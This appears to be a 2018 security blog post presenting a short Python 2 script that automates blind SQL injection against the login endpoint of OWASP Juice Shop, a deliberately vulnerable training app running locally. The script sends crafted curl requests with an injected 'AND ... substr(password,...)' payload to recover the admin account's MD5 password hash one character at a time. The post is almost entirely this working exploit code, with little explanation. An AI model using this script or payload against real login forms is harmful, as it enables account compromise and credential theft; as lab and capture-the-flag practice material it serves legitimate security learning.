#!/usr/bin/python2
import os
import subprocess
currentHash = ""
stringList = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f"]
for sizeHash in range(1,33):
for hashString in stringList:
command = "curl -H 'Content-Type: application/json' -d \"{\\\"email\\\":\\\"admin@juice-sh.op' AND '"
command += str(currentHash) + str(hashString)
command += "'=substr(password,1,"
command += str(sizeHash)
command += ")--;\\\",\\\"password\\\":\\\"test\\\"}\" http://172.17.0.2:3000/rest/user/login"
output = subprocess.check_output([command], shell=True, stderr=subprocess.STDOUT)
if "admin@juice-sh.op" in output:
print "Hash: " + str(currentHash) + str(hashString)
currentHash = str(currentHash) + str(hashString)
break
print "MD5 hash of admin@juice-sh.op: " + currentHash
# Validate hash with the following command: echo -n "admin123" | md5sum
Tuesday, February 13, 2018
Juice-shop Challenge with SQL Injection
In a challenge to create an automated way to extract the password hash from Juice-Shop at the login prompt through sql injection, I created the following script.
Subscribe to:
Post Comments (Atom)
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist... -
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them... -
I ran a Nikto scan and found the following vulnerability in the report that it produces: "OSVDB-637: Enumeration of users is possible...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th... -
Today looking at the logs of the honeypots, I became curious based on the whois of the IP Addresses attempting to login to SSH which country...
No comments:
Post a Comment